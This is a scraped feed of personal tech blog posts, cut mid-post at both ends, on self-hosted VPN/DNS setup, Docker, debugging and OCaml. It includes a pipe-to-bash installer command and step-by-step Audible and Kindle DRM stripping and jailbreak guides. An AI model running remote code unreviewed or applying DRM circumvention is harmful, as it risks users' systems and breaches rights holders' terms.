ICMP echo request, id 52630, seq 1, length 64\nOkay, this is getting interesting. wg0 is definitely receiving packets from our client. Arghhh. Now does it strike to you? Our actual network routing is through eth0 (on DO usually) and wg0 is just some interface created by Wireguard. They have no “connection” (no pun intended) between them. Let us confirm if this actually is the problem by detecting ICMP traffic on this interface(eth0) using the same command:\n# on wireguard server\n$ sudo tcpdump -nni eth0 -Q in icmp\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on eth0, link-type RAW (Raw IP), capture size 262144 bytes\n... # nothing happens even if we are sending PING from client\nWow, see? No ICMP packets received on eth0. So that indeed is the problem and we have zero’ed it down using tcpdump.\n(Note to self: Learn more Linux debugging utils, these things are a godsend!)\nIn order to fix this, we need to do 2 things:\nIP Forwarding\n$ vim \u002Fetc\u002Fsysctl.conf\n# check for this line and replace the value from 0 to 1\nnet.ipv4.ip_forward = 1\n$ sudo sysctl -p\nIP Tables Rules\nWe need to set up NAT between eth0(could be different for you) and wg0. This can be done using iptables and wireguard actually has a nice mechanism to run custom commands using PostUp\u002FPostDown signals.\n# on wireguard server\n$ vim \u002Fetc\u002Fwireguard\u002Fwg0.conf\n# add these lines in [Interface] section\nPostUp = iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE; ip6tables -A FORWARD -i wg0 -j ACCEPT; ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Configure iptables to setup a NAT on eth0 and forward the packets (ipv4 and ipv6) on interface wg0 to eth0\nPostDown = iptables -D FORWARD -i wg0 -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE; ip6tables -D FORWARD -i wg0 -j ACCEPT; ip6tables -t nat -D POSTROUTING -o eth0 -j MASQUERADE # Delete the rule since when wireguard is down, wg0 doesn't exist\nNow everything’s set up and we are browsing the internet privately using a VPN. Ensure that your public IP is of the VPN server when you’re browsing and it’s not leaking.\nSetting up Pi-hole#\nInstalling Pi-hole is as simple as\ncurl -sSL https:\u002F\u002Finstall.pi-hole.net | bash\nYou can read more about installation in the official docs.\nA nice GUI is always a plus, so make sure you enable that option while installing Pi-hole.\n\nNow, we need to configure our Wireguard client to use Pi-hole as a nameserver for DNS resolution.\n# on the client add the following line\nsudo vim \u002Fetc\u002Fwireguard\u002Fwg0.conf\n[Interface]\n...\nDNS = \u003Cvpn_server_public_ip>\n...\nPi-hole runs on port 53 and accepts DNS queries over UDP. Any query is first checked by Pi-hole in the blacklist. If it’s present in the blacklist, it’s immediately dropped. If not, Pi-hole will forward our DNS query to one of the forwarder configured (1.1.1.1 for eg or our custom server, explained in the next step).\nSetting up Unbound DNS#\nI don’t mind trusting Cloudflare. But I simply don’t have to. :) And once you make peace with the fact that you don’t need 3rd party companies controlling your networking stack, you’ll sleep better.\nI have setup Unbound without any forwarders. Unbound is a recursive resolver which supports DNSSec and caching mainly. Unbound first checks if the query exists in cache and if it does, it directly returns the “answer”. Otherwise it talks to the root nameserver and then the whole DNS dance happens. Since our DNS query is now split into multiple parts, where each nameserver is only being queried for a part of the FQDN (also known as QNAME minimialistion), it becomes a lot harder for anyone to intercept or reconstruct your DNS queries.\nYou can install unbound using\n$ sudo apt-get install unbound\nTo start using Unbound, we need a file root.hints which contains information about root nameservers. You can cron this to fetch a new copy every once in 3-4 months, it hardly changes.\n$ wget -O root.hints https:\u002F\u002Fwww.internic.net\u002Fdomain\u002Fnamed.root\n$ sudo mv root.hints \u002Fvar\u002Flib\u002Funbound\u002F\n$ sudo service unbound restart\nYou can verify if the DNS queries are being resolved by:\n# 6363 is where I have configured my Unbound server to listen\ndig mrkaran.dev @127.0.0.1 -p 6363\nPi-hole official docs have a great explainer on how to configure Unbound with Pi-hole so I won’t be repeating the steps here again.\nYou can configure Pi-hole to forward accepted DNS queries from port 53 (standard) to 127.0.0.1#6363 (unbound).\n\nThe Endgame#\nI plan to self-host a couple of more things. DNS is something I am really interested in and in future I plan to host my own DNScrypt server soon-ish.\nI believe if you own your data you’re in better control of your digital identity. Watching too much of Black Mirror added to the paranoia to an extent, I suppose! I grew up in the late nineties and I’ve seen the internet primarily as a set of the decentralized toolchain. There’s no reason we should let go any of that to the hands of a few corp giants and make it centralized.\nEnding this long-ish post by a beautiful quote:\nStudy after study has shown that human behaviour changes when we know we’re being watched. Under observation, we act less free, which means we effectively are less free.\n― Edward Snowden\nCheers! :)",[],{"slug":2360,"title":2361,"link":2362,"pubDate":2363,"contentSnippet":2364,"tags":2365,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"cleaning-google-purchases","Cleaning up Google Purchases","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2019\u002F06\u002F01\u002Fcleaning-google-purchases\u002F","2019-06-01T00:00:00.000Z","The Google Purchase History feature has been doing rounds in the news recently. In case you missed it, go to https:\u002F\u002Fmyaccount.google.com\u002Fpurchases right now and make sure you are logged in with your personal gmail account to see what all Google thinks you’ve bought.\nFor me it lists purchases going as far back as 2013, which include:\nAll of my Amazon Purchases (including Kindle and Audible)\nFlipkart\u002FSneapdeal purchases\nGifts I’ve bought for others on various platforms\nAll my iCloud purchases\nPurchases on Steam\nBigBasket purchases\nGoogle Playstore purchases as well, of course\nAnd much, much more.\nFor each of the purchases, it remembers the price, the taxes, as well as the delivery address used.\nWhile this isn’t shocking in the least, I was surprised, because as a Infosec professional, I’ve disabled all of google’s invasive tracking features:\nAll my Activity Controls are paused.\nGoogle Location history is disabled for my account.\nI have Shared endorsements turned off.\nAd personalization is turned off.\nI used to run with the Protect my Choices extension till a while back to avoid targeted advertising.\nRegardless, the Google purchases page had hundreds of results, going back half a decade. Google currently does not offer a way to delete collected purchases directly, or to pause this collection in any way. The only way is to find the emails that Google scanned, and delete them.\nI ended up deleting everything from the following email addresses:\n\nauto-confirm@amazon.com\nauto-confirm@amazon.in\ncs@flipkart.com\ndigital-no-reply@amazon.com\ndo_not_reply@audible.com\ndo_not_reply@gog.comorders@services.target.com\nebay@ebay.in\ngoogleplay-noreply@google.com\nhelp@stickermule.com\nmail@info.fabfurnish.com\nno-reply@flipkart.com\nno-reply@paytm.com\nno_reply@email.apple.com\nnoreply@flipkart.com\nnoreply@pizzahut.co.in\nnoreply@snapdeals.co.in\nnoreply@steampowered.com\nnotification@wish.com\norder-update@amazon.in\norders@services.target.com\npayments-messages@amazon.in\nreturn@amazon.in\nship-confirm@amazon.com\nship-confirm@amazon.in\nshipment-tracking@amazon.com\nshipment-tracking@amazon.in\nupdates@myntra.com\n\n\nNote that deleting the email doesn’t seem to be sufficient either, you need to clear your Trash, and then wait for a while (almost 2 days for me) before the system refreshes. After 3 days of just deleting mails, I finally got this screen:\n\nGoogle seems to be picking up all kinds of emails, including:\nInvoices\nShipment Confirmations \u002F Updates\nReturn confirmations\nPayment Confirmations\nOrder Cancellations\nPayment Failures (gasp!)\nWarning about Deletions\nI’ve already switched away from Amazon\u002FFlipkart emails from my Gmail. But deleting invoices from your inbox isn’t always the best idea. Most websites will let you re-download invoices (Amazon\u002FFlipkart do), but take care not to delete any necessary emails that you might need for warranty claims or any other purpose later.",[],{"slug":2367,"title":2368,"link":2369,"pubDate":2370,"contentSnippet":2371,"tags":2372,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"dnscrypt-migrating-to-docker","Migrating DNSCrypt Server to Docker","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2019\u002F05\u002F18\u002Fdnscrypt-migrating-to-docker\u002F","2019-05-18T00:00:00.000Z","I’ve been running a personal DNSCrypt server in Bangalore for the last 2 years. When I set it up, it was just a compiled version of dnscrypt-wrapper, which was the bare minimum setup I could do.\nSince then, I’ve upgraded it to a distribution supported version, but recent changes in dnscrypt key rotation, I’ve been wanting to setup something automated as well.\nThe easiest way was to switch to the official DNSCrypt Docker image, which does both key generation and certificate rotation. Since my public key was already present in the DNSCrypt Server lists, I was not too keen to regenerate a new key.\nThe primary challenge was ensuring that the docker container picks up my existing keys without trying to generate new ones from scratch. It was basically 2 steps:\nMatch the directory structure that the container expects.\nInvoke the container directly into start mode while passing existing keys.\nDirectory Structure\nI copied my keys (public.key, secret.key) to \u002Fetc\u002Fdnscrypt-keys and ran the following:\n\necho 2.dnscrypt-cert.captnemo.in > provider_name\ntouch provider_info.txt # I couldn't figure out how to output the same info, so kept it blank\nhexdump -ve '1\u002F1 \"%.2x\"' \u003C public.key > public.key.txt\n\n\nThen I ensured that the file permissions are matching what the container expects:\n\nchmod 640 secret.key\nchmod 644 public.key\nchown root:1002 public.key secret.key\nchmod 644 provider_name\n\n\nThis is how the final permissions looked for the directory (\u002Fetc\u002Fdnscrypt-keys)\n\n-rw-r-----   1 root 1002    64 May 18 07:15 secret.key\n-rw-r--r--   1 root 1002    32 May 18 07:15 public.key\n-rw-r--r--   1 root root    28 May 18 07:19 provider_name\n-rw-r--r--   1 root root     0 May 18 07:23 provider_info.txt\n-rw-r--r--   1 root root    64 May 18 07:25 public.key.txt\ndrwxr-xr-x   2 root root  4096 May 18 07:26 .\n\n\nRunning the Container\nThen, I directly ran dnscrypt-wrapper container:\n\ndocker run --detatched --restart=unless-stopped --volume \u002Fetc\u002Fdnscrypt-keys:\u002Fopt\u002Fdnscrypt-wrapper\u002Fetc\u002Fkeys --publish 10.47.0.5:4434:443\u002Ftcp --publish 10.47.0.5:4434:443\u002Fudp jedisct1\u002Fdnscrypt-server start\n\n\nI pass a host path mount instead of creating a Docker Volume, since they can get deleted in regular docker prune.\nHere, 10.47.0.5 is the “Anchor IP”, which Digital Ocean internally maps to my Floating IP.\nThe container comes up, generates new short-term keys and goes live:\n\nStarting DNSCrypt service for provider:\n2.dnscrypt-cert.captnemo.in\nStarting pre-service scripts in \u002Fetc\u002Frunit_init.d\nsetup in directory \u002Fopt\u002Funbound\u002Fetc\u002Funbound\ngenerating unbound_server.key\nGenerating RSA private key, 3072 bit long modulus (2 primes)\n.......++++\n...................++++\ne is 65537 (0x010001)\ngenerating unbound_control.key\nGenerating RSA private key, 3072 bit long modulus (2 primes)\n.........................++++\n........................................++++\ne is 65537 (0x010001)\ncreate unbound_server.pem (self signed certificate)\ncreate unbound_control.pem (signed client certificate)\nSignature ok\nsubject=CN = unbound-control\nGetting CA Private Key\nSetup success. Certificates created. Enable in unbound.conf file to use\nok: run: unbound: (pid 28) 300s\nok: run: dnscrypt-wrapper: (pid 31) 300s\nok: run: unbound: (pid 28) 600s\nok: run: dnscrypt-wrapper: (pid 31) 600s\n\n\nOnce the server was up, I verified connectivity with dnscrypt-proxy and it worked perfectly.\nFuture Scope\nRight now, I have a single container that does 2 things:\nCertificate Rotation via a service that checks it every 30 minutes.\nDNSCrypt Service, which is accessible over the internet.\nFor (1) to work, it needs access to the Private Keys that are used to sign the temporary certificates that last 24 hours. Since both things are managed within the same container, the container ends up with both network and long-term keys access. This means, any RCE on the service can result in the long-term keys being compromised.\nA simple fix for this would be to separate out the Certificate Rotation part into a separate “mode” on the Docker Image, which can be called independently. This would allow someone to run certificate rotation on a second container using a scheduler, but with far more limitations (such as no network access). A common file-mount between both the containers can take care of sharing the temporary keys between the containers, and a simple unix socket on the shared-file-mount can be used to signal a certificate rotation (this triggers the dnscrypt service restart, so it picks the new cert).",[],{"slug":2374,"title":2375,"link":2376,"pubDate":2377,"contentSnippet":2378,"tags":2379,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"0000-rr-debugging","Deterministically debugging concurrent GC bugs with rr","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmulticore\u002Frr\u002F2019\u002F04\u002F28\u002F0000-rr-debugging\u002F","2019-04-28T00:00:00.000Z","Multicore OCaml comes with\na concurrent garbage\ncollector, where\nthe garbage collector and the mutator threads run concurrently. Debugging\nconcurrent GC bugs has been the most frustrating \u002F satisfying (when fixed) part\nof Multicore OCaml development. rr, a record and\nreplay tool has made debugging concurrent GC bugs a sustainable exercise. In\nthis short post, I’ll describe why.\nA particularly tricky concurrent GC bug is one which occurs once every 10 to 100\nruns due to non-determinism and any attempt to instrument the program to isolate\nthe bug (simplifying the program, adding print statements, etc.) makes it\ndisappear. The bug may only appear relatively late in the program run – after a\nfew major GC cycles, where the program might have allocated 10s of gigabytes of\nmemory by then. The bug usually manifests as a segfault due to illegal memory\naccess, but the source of the bug may lie in the previous GC cycle and perhaps\ndue to actions of a different thread than the one that is throwing up the error.\ngdb often doesn’t help since finding the illegal memory access may not give\nany clue as to when the heap was corrupted.\nrr to the rescue. rr is an enhancement over gdb with support for recording\nan execution and debugging in reverse. Once a failing execution is recorded,\nthe execution can be replayed multiple times deterministically. This removes the\nnon-determinism from debugging session. gdb does support record and replay,\nbut not on multi-threaded targets.\nThe fact that the program can be run in reverse is the key for debugging heap\ncorruptions. An illegal access typically appears as a load or store to a illegal\nmemory address obtained from a heap object. When such an illegal access is\nfound, I set a hardware watchpoint on the heap address containing the illegal\naddress and continue the program in reverse. rr runs the program in reverse until\nthe write that stored the illegal address in the heap object! Usually, several\ntransitive reverse runs are necessary to get to the source of the bug, but this\nis just mechanics.\nWhile rr supports multi-threaded programs, it runs every thread on the same\ncore. This usually makes the bug disappear. Luckily, rr comes with support for\nforcing a context switch after a certain number of CPU ticks (measured in terms\nof the number of retired conditional branches). Even with this option, you will\nneed many runs before rr comes across a buggy execution. So I use the\nfollowing command:\n\nfor i in {1..10000}; do rr record -c 10000 \u003Cprogram> \u003Cargs>; if (( $? == 0 )); then echo \"done $i\"; else break; fi; done\n\n\nwhich runs \u003Cprog> \u003Cargs> under rr where a thread is allowed to execute for a\nmaximum of 10,000 ticks before a context switch. rr runs are repeated until a\ncrash is found or 10,000 rr runs are successfully completed. Depending on the\nprogram being debugged, I leave it running overnight. If rr had in fact found\na crash, I can perform replay debugging with rr replay the following morning\nand have a deterministic and reversible recorded execution to work with.\nrr has save countless hours in the development of Multicore OCaml, and rr\nshould be a essential tool in every GC hacker’s toolbox.",[],{"slug":2381,"title":2382,"link":2383,"pubDate":2384,"contentSnippet":2385,"tags":2386,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"1600-ml-workshop-2019","ML Family Workshop 2019: Call for presentations","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fhaskell\u002Fstandard%20ml\u002Ff%23\u002F2019\u002F04\u002F22\u002F1600-ml-workshop-2019\u002F","2019-04-22T16:00:00.000Z","I am chairing the PC for ML family workshop this year. The PC is happy to invite\nsubmissions for the workshop to be held during the ICFP conference week on\nThursday 22nd August 2019.\nML family workshop invites submissions touching on the programming languages\ntraditionally seen as part of the “ML family”. However, we are also keen to\nreceive submissions from other related language groups. If you have questions\nabout the suitability of your work for the workshop, please feel free to write\nan email.\nThe detailed CFP is available on the ICFP website:\nhttps:\u002F\u002Ficfp19.sigplan.org\u002Fhome\u002Fmlfamilyworkshop-2019#Call-for-Presentations\nImportant dates\nThu 16 May 2019 – (AoE)Submission deadline\nSun 30 Jun 2019 – Author Notification\nThu 22 Aug 2019 – ML Family Workshop\nProgram Committee\nAggelos Biboudis – EPFL, Switzerland\nAndreas Rossberg – Dfinity, Germany\nAtsushi Igarashi – Kyoto University, Japan\nAvik Chaudhuri – Facebook, USA\nCyrus Omar – University of Chicago, USA\nDavid Allsopp – University of Cambridge, UK\nEdwin Brady – University of St. Andrews, UK\nJacques-Henri Jourdan – CNRS, LRI, Université Paris-Sud, France\nKC Sivaramakrishnan – IIT Madras, India\nLars Bergstrom – Mozilla Research, USA\nMatthew Fluet – Rochester Institute of Technology, USA\nZoe Paraskevopoulou – Princeton University, USA\nSubmission details\nWe seek extended abstracts, up to 3 pages long. Submissions must be uploaded to\nthe workshop submission website:\nhttps:\u002F\u002Ficfp19mlworkshop.hotcrp.com\u002F",[],{"slug":2388,"title":2389,"link":2390,"pubDate":2391,"contentSnippet":2392,"tags":2393,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"docker-mistakes-1","Common Docker Mistakes - Episode 1","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fdocker-mistakes-1\u002F","2019-04-15T05:27:55.000Z","So, off late, I’ve been dabbling a lot with Docker to explore the world of containerization (too late to the party, eh?). I plan to write about some common docker gotchas. The plan is to document these learnings so they might help someone getting started with docker and also serve as a reference for myself in the future. Let me be clear, if you read the docs you will find the exact same information and there’s nothing new that I have discovered. It took me some time to get around the following issues and I believe some of you might be struggling with the same. I just feel when you’re starting out with completely new technology, things quickly can become overwhelming and it’s A-OK to feel so. The important part is to not get intimidated by it and focus on learning the basics. Different pieces start coming together and there you have a solved puzzle :)\nThe mysterious case of bind mounts and volumes#\nAh! Storage. It’s always not a rosy scenario whenever someone mentions storage and containers in the same sentence. Anyway, so I had this requirement where I needed 2 containers to share data. Either of the containers could modify this data, so it made for a strong use case for volumes. But for some strange reason, I decided to use bind mounts. My thought process was that I’ll bind the mount path of the host to container and both of them could share the data.\nNow, I know, I know all the docker veterans already facepalming so hard, but in case anyone new to docker is reading it, it works the exact way I described. The host path will be mounted ON the container, so if your host path is empty, so will your container be. It took me quite some time to figure this out because of the side effect of it. I had this line in my docker-compose:\nvolumes:\n  - type: bind\n    source: \u002Fetc\u002Fcustom\u002Fdata\n    target: \u002F\nAs you can guess, I am mounting an empty folder etc\u002Fcustom\u002Fdata on the root directory of the container \u002F. This was an nginx container and I got the weird error that nginx executable isn’t found. It became clear that I have obviously done something wrong. After reading the documentation, it became clear that I had to use something like Named Volumes and use the same volume label for both the containers. Here’s the correct docker compose example (I have removed the unnecessary fluff and only included the volumes part):\n  nginx:\n    volumes:\n      - type: volume\n        source: assets-vol\n        target: \u002Fusr\u002Fshare\u002Fnginx\u002Ffrontend\n  frontend:\n    volumes:\n      - type: volume\n        source: assets-vol\n        target: \u002Ffrontend\u002Fdist\n\nvolumes:\n  assets-vol:\nassets-vol is a named volume and can be managed using docker API.\nCMD vs RUN#\nNow, this is particularly interesting. So I have a volume mount as shown in the previous example, and quite naively I am copying some files from container 1 to container 2 at build stage. I get the error that this path doesn’t exist. I am seriously reconsidering my life decisions right now.\nRUN cp \u002Ffrontend\u002Fdist \u002Fusr\u002Fshare\u002Fnginx\u002Ffrontend\nAnd then it became apparent that the volume is only mounted while the container is running, not when it is building. So I had to use CMD.\nCMD cp \u002Ffrontend\u002Fdist \u002Fusr\u002Fshare\u002Fnginx\u002Ffrontend\nWhy RUN doesn’t work and CMD works, you might ask? This is because that’s how docker volumes are in nature. They bypass the unionFS (which is used to build docker images). UnionFS chain together a layer of images and build new images on top. Whenever you run a container from an image, a new layer is created for the container process. If you specify a path as a volume, this path doesn’t get committed to the container data layer and is bypassed. So, TL;DR, volumes are really only accessible when the container is running and you can’t access them while building.\nEpilogue#\nI plan to share more such silly mistakes of mine while exploring more of Docker (and hopefully running production workloads on it soon!). It really is fun though, believe me :)",[],{"slug":2395,"title":2396,"link":2397,"pubDate":2398,"contentSnippet":2399,"tags":2400,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"audible-drm","Stripping Audible DRM","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2019\u002F04\u002F14\u002Faudible-drm\u002F","2019-04-14T00:00:00.000Z","Self-Guide for stripping the Audible DRM, in similar vein as my Kindle Self-Guide.\nDownload the aax file from Audible website.\nRun the inAudible-NG Rainbrow crack table against the AAX file.\nEasiest way is via docker\u002Fpodman:\n\ncd ~\u002FMusic\u002FAudiobooks\npodman run -v $(pwd):\u002Fdata ryanfb\u002Finaudible@sha256:b66738d235be1007797e3a0a0ead115fa227e81e2ab5b7befb97d43f7712fac5\nfor i in \"*.m4a\"; do fix-audible-m4a \"$i\";done\n\n\nThe cool part about this is that the entire activation is done offline, and runs a Rainbow Table attack against the Audible DRM. To make the process faster in the future, you can save your “activation bytes” (8 hex characters) and directly use them with ffmpeg to decode instead:\nffmpeg -loglevel panic -y -activation_bytes ${AUDIBLE_ACTIVATION_BYTES} -i \"$aax_file\" -c:a copy -vn \"$m4a_file\"\nA small percentage of Audible AAX files have a incorrect bit set in the “Audio Object Type Specific Config” in the ESDS atom in an M4A file, which leads to them not playing in\nFirefox\u002FAndroid and some other players. To fix this, I have a fix-audible-m4a script called above.\nReferences\nhttps:\u002F\u002Fgithub.com\u002Fryanfb\u002Fdocker_inaudible_rainbowcrack\nhttps:\u002F\u002Fgithub.com\u002FinAudible-NG\u002Ftables\nhttps:\u002F\u002Frentry.co\u002Fn4ost",[],{"slug":2402,"title":2403,"link":2404,"pubDate":2405,"contentSnippet":2406,"tags":2407,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"1400-ocaml-baremetal-shakti","OCaml on Baremetal Shakti RISC-V processor","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Friscv\u002Fshakti\u002F2019\u002F03\u002F29\u002F1400-ocaml-baremetal-shakti\u002F","2019-03-29T14:00:00.000Z","It has been 3 months since I joined IIT Madras and it\nhas been good fun so far. Along with the members of the RISE\ngroup, we’ve initiated a project to build secure\napplications on top of secure extensions of the open-source\nShakti RISC-V processor ecosystem. Unsurprisingly, my\nlanguage of choice to build the applications is OCaml.\nGiven the availability of rich ecosystem of libraries under the\nMirageOS library operating system for building unikernels,\nwe hope to minimise the amount of unsafe C code that the hardware has to contend\nwith and protect exploits against. As a first step, we have managed to get OCaml\nprograms to run on directly on top of the Shakti processor running in simulation\nunder QEMU and Spike ISA simulators without an intervening operating system.\nA custom bootloader performs the necessary hardware initialisation and\ntransfers control directly to the OCaml program. We have\nopen-sourced\nall of the tools necessary to build your own kernel. This handy\ndockerfile\ndocuments the entire process. For the impatient, an image is available in the\ndockerhub:\n\n$ docker run -it iitmshakti\u002Friscv-ocaml-baremetal:0.1.0\n\n# Write your program\n$ echo 'let _ = print_endline \"A camel treads on hardware!\"' > hello.ml\n# Compile for Shakti\n$ ocamlopt -output-obj -o payload.o hello.ml\n$ file payload.o\npayload.o: ELF 64-bit LSB relocatable, UCB RISC-V, version 1 (SYSV), not stripped\n\n# Link with bootcode and build the kernel\n$ make -C ..\u002Fbuild\nmake: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[1]: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[2]: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[2]: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\n[ 64%] Built target boot\nmake[2]: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[2]: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\n[ 78%] Built target freestanding-compat\nmake[2]: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[2]: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\n[ 85%] Built target asmrun_t\nmake[2]: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[2]: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\n[ 92%] Built target nolibc_t\nmake[2]: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[2]: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\n[100%] Built target kernel\nmake[1]: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\n$ file kernel \nkernel: ELF 64-bit LSB executable, UCB RISC-V, version 1 (SYSV), statically linked, with debug_info, not stripped\n\n# Run under spike RISC-V ISA simulator\n$ spike kernel\nocaml-boot: heap@0x80042be8 stack@0x8002fbc0\nA camel treads on hardware!\nocaml-boot: caml runtime returned. shutting down!\n\n# Run under QEMU\n$ qemu-system-riscv64 -machine spike_v1.10 -smp 1 -m 1G -serial stdio -kernel kernel\nVNC server running on 127.0.0.1:5900\nocaml-boot: heap@0x80042be8 stack@0x8002fbc0\nA camel treads on hardware!\nocaml-boot: caml runtime returned. shutting down!\n\n\nThe immediate next step will be getting the code to run on a Shakti softcore on\nan FPGA. In addition to targeting high-end FPGAs, we will also be targeting the\n$100 Arty\nA7\nhobbyist board and release all of the software under liberal open-source\nlicenses.\nFurther along, we will port mirage libraries to Shakti following similar to the\nsetup in Well-typed lightbulbs and\nimplementing hardware security enhancements in Shakti for preventing spatial and\ntemporal attacks while running unsafe C code (with the ability to dynamically\nturn it off when running OCaml!), hardware-assisted compartments, etc. Lots of\nexciting possibilities on the horizon!\nAcknowledgements\nMuch of this work was done by the incredible Malte,\nwho is a visiting student at IIT Madras on a semester away from Leibniz\nUniversity Hannover,\nArjun, Lavanya,\nAmbika, Chester, and the rest of the\nShakti team. The RISC-V port of OCaml is developed and maintained by Nicolás\nOjeda Bär.",[],{"slug":2409,"title":2410,"link":2411,"pubDate":2412,"contentSnippet":2413,"tags":2414,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"kindle-self-guide","Kindle Hacks, A Self-guide","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2019\u002F03\u002F26\u002Fkindle-self-guide\u002F","2019-03-26T00:00:00.000Z","I run a non-standard Kindle configuration:\nJailbroken (because I want to own the device, not rent it)\nRuns KOReader (because I want to read EPUBs and PDFs with reflow.)\nDRM Stripping (because I want to own the book, not rent it)\nSince I don’t do any of these often enough to automate it, this is a self guide to help me follow these steps the next time I have to do any of this. No guarantees of this being helpful to anyone else but me.\nJailbreak\nThe lifehacker guide on how to jailbreak your kindle is a good starting point [archived]. The mobileread forums have the definitive guides. Also see this FAQ on the mobileread wiki.\n(Most of these only cover modern paperwhite kindles)\nMaintaining the Jailbreak\nSometimes, Kindle firmware updates will stop the Jailbreak. Search for your firmware on mobileread forums. See this link for the 5.8 series.\nCopy the .bin file to your kindle root directory and trigger a manual firmware update. That should reboot and re-affirm the jailbreak. To trigger a manual firmware update, go to the Kindle Menu and click “Update”. If it is greyed out, check if the file was copied correctly, and try rebooting.\nApplications\nOnce you have a jailbreak, the rest is mostly installing packages via MRPI. I keep a ready directory of packages I can copy as-is to my Kindle. The current listing is at https:\u002F\u002Fpaste.ubuntu.com\u002Fp\u002FCXS5hYZdqc\u002F with most of it just being koreader.\nkoreader is a FOSS document viewer for E Ink devices that supports Kindle, Kobo, PocketBook, Ubuntu Touch and Android devices.\nThe primary 2 packages are:\nUpdate_KUALBooklet_v2.7_install.bin\nupdate_kpvbooklet_0.6.6_install.bin\nRun ;log mrpi via search after copying them to re-install them if needed.\nkoreader\nDownload the latest release from GitHub.\nYou should download the kindle5-linux-gnueabi package for modern Paperwhites. Unzip it to the copy directory mentioned above.\nAside: koreader has a linux appimage version for desktops, which I package for AUR.\nDRM Related Stuff\nDRM is inherently bad for users. If I switch my Ebook reader from Kindle (which are great as of today) to\na Kobo tomorrow, I want my content to stay with me.\nThere are much better websites that explain the issues with DRM, so go visit: fckdrm.com, DefectiveByDesign.org, or EFF\u002Fdrm.\nThe primary tool for stripping DRM from Kindle books is apprenticeharper’s DeDRM Repo which works as a Calibre Plugin. If you are running calibre with Python 3 (such as via the calibre-python3 package on Arch Linux) - you should install the DeDRM plugin from the python3 fork. Compress the DeDRM_plugin directory into a flat-zip file and use that in Calibre.\nGetting the Key\nMy current key is saved in pass:\npass show Keys\u002FKindle.k4i |jq\nSave it in a file, which you can import to Calibre.\nIf you don’t have the key or if the above isn’t valid, see this comment on r\u002Febooks [archived].\nImporting the Key\nAt the bottom-left of the plugin’s customization dialog, you will see a button labeled “Import Existing Keyfiles”. Use this button to import existing ‘.k4i’ key files. Key files might come from being exported from this plugin, or may have been generated using the kindlekey.pyw script running under Wine on Linux systems.\nI once did some trickery on the kindlekey.pyw application to get it working on my system, but I didn’t take notes. If I ever do this again - AUTOMATE THIS.\nGetting a copy of the encrypted book\nThere are multiple sources for you to try.\nAmazon website’s My Content page is the easiest. It doesn’t work for books with special typesetting - quite rare. Prefer this over everything else.\nDownload via the Kindle for PC application (See next section).\nGet the KFX file from your Kindle device.\nCopy the KFX\u002FAZW file from the Android\u002FiOS application.\nKindle for PC\nStripping DRM for any medium is always a cat-and-mouse game. Amazon keeps changing the DRM format in every Kindle firmware update, which is why the recommended method is to use a known\u002Folder version of the Kindle for Mac\u002FPC Application as your source.\nNote: The 1.24.3 release does not work on Linux. If you’re on Linux, you must instead download the 1.17.0 release instead (sha256=14e0f0053f1276c0c7c446892dc170344f707fbfe99b6951762c120144163200).\nInstall Kindle for PC. It does work on Wine. Make sure you download 1.24.3 (51068). I trust filehippo for this. The sha256sum for the installer is c7a1a93763d102bca0fed9c16799789ae18c3322b1b3bdfbe8c00422c32f83d7.\nInstall then launch it, and download the book.\nGo to ~\u002FDocuments\u002FMy Kindle Content\nFind book by Last Modified Date.\nRun calibredb add book.azw. If all goes well, the book should show up in your library, and you should be able to convert it.\nReference Files\nI have a backup of my current Kindle files at http:\u002F\u002Fge.tt\u002F75zk4Dv2 in case you need any of the files mentioned above. Checksums for the files are below, since ge.tt doesn’t believe in HTTPS:\n\ne3b05193ed9d0b482f01dfb550eba67f3b113b5165aae5632379cf35fec2f59d  copy.tar.gz\n14e0f0053f1276c0c7c446892dc170344f707fbfe99b6951762c120144163200  KindleForPC-installer-1.17.44170.exe\nc7a1a93763d102bca0fed9c16799789ae18c3322b1b3bdfbe8c00422c32f83d7  KindleForPC-installer-1.24.51068.exe\n50bb0e5d9c03bcb79b17c1b7063cefd2c947a9d1c4392814e6ec05225296472a  kual-helper-0.5.N.zip\n39352b4b68993680f06d5ecc57ce7ec4c271b6b5f2386ea998027420c45f2acd  